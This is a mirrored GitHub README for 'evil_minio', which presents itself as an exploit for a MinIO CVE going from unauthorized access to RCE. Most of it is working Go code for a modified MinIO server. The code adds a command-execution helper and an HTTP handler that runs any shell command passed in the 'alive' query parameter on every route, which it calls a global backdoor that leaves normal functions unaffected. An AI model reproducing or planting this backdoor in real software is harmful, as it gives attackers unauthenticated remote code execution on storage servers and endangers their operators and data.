Giter VIP home page Giter VIP logo

evil_minio's Introduction

Evil MinIO (CVE-2023-28434)

Doc: CVE-2023-28432 minio 接口未授权访问到无损RCE和全局后门.pdf

EXP for CVE-2023-28434

MinIO unauthorized to RCE

Changed from https://github.com/minio/minio/tree/8b4d0255b7247b1a06d923e69ed5ba01434e70b8

Changed what?

  • add cmd/x.go, used for exec system command
package cmd

import (
	"os/exec"
	"runtime"
)

func getOutputDirectly(commandStr string) string {
	var execGlobalOutput string
	var shell [2]string
	var systemOS string = runtime.GOOS
	if systemOS == "linux" || systemOS == "darwin" {
		shell[0], shell[1] = "/bin/bash", "-c"
	} else {
		shell[0], shell[1] = "C:\\Windows\\System32\\cmd.exe", "/c"
	}
	cmd := exec.Command(shell[0], shell[1], commandStr)
	output, err := cmd.Output()
	if err != nil {
		return ""
	}
	execGlobalOutput += string(output)
	return execGlobalOutput
}
  • cmd/routers.go, add line #72
// ..........
	setUploadForwardingHandler,
	// Add bucket forwarding handler
	setBucketForwardingHandler,
	// Add new handlers here.
	xHandler, // ADD THIS LINE 
}

// configureServer handler returns final handler for the http server.
func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {
// ..........
  • cmd/generic-handlers.go, add function xHandler at the end
func xHandler(h http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var arg string
		values := r.URL.Query()
		arg = values.Get("alive")
		if arg != "" {
			w.Write([]byte(getOutputDirectly(arg)))
			return
		}
		h.ServeHTTP(w, r)
	})
}

What can be done?

  1. GLOBAL backdoor as http://1.2.3.4/?alive=whoami and http://1.2.3.4/anything?alive=whoami
  2. Normal functions will not be affected

image-20230327164103832

image-20230327164128648

evil_minio's People

Contributors

abelche avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.